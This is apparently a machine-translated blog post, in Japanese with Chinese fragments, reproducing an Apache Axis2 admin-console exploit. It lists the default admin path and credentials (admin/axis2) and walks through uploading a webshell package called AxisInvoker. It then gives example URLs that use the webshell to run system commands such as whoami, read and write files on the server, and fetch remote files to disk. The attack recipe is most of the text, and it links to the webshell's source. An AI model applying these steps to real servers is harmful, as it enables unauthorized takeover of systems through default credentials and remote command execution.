0x00はじめに
ApacheのAxis2のは、あるW EBサービスは、コアエンジンをサポートしています。AXIS2は、古いAXISを再設計および書き直し、JavaとCの2つの言語で開発バージョンを提供します。
実際、AXIS2はWEBアプリケーション用のWebサービスインターフェースを提供するだけでなく、別個のサーバーとして表示することもでき、Apache Tomcatと簡単に統合できます。現在、AXIS2の最新バージョンは1.6.2です。
Axisは、オープンソースのXMLベースのWebサービスアーキテクチャです。もともとはIBMによって開発され、IBM-SOAPと呼ばれていました。その後、ApacheFoundationはSOAPに基づいてAXISを立ち上げました。AXISは、基本的にJava言語で記述されたSOAPエンジンです。これを使用して、さまざまな分散アプリケーションで相互に操作および対話できます。
0x01脆弱性の再発
デフォルトのポート:8089
デフォルトのバックグラウンドパス:/ axis2-admin / login
デフォルトのアカウントパスワード:admin / axis2
[ツール]-[サービスのアップロード]を選択して 、getshellのaarパッケージをアップロードします
成功すると、「FileAxisInvoker.aarが正常にアップロードされました」というプロンプトが表示されます。
http://xxx.xxx.xxx.xxx/axis2/services/Cat/exec?cmd=ipconfig
0x02使用方法
馬の使い方:
支持的命令:
exec-运行命令,在Linux / Windows上均可使用,不用担心。
http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=whoami
写-写文件
http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123
info-显示某些信息,根据需要进行修改
http://192.168.56.103:8080/axis2/services/AxisInvoker/info
读取-读取文件内容
http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini
下载-下载文件并将其保存在某处
http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt
ダウンロードリンク:https://github.com/CaledoniaProject/AxisInvoker
次のことを示してください:Adminxeのブログ » ApacheAxis2バックグラウンドファイルのアップロードgetshellの脆弱性の再現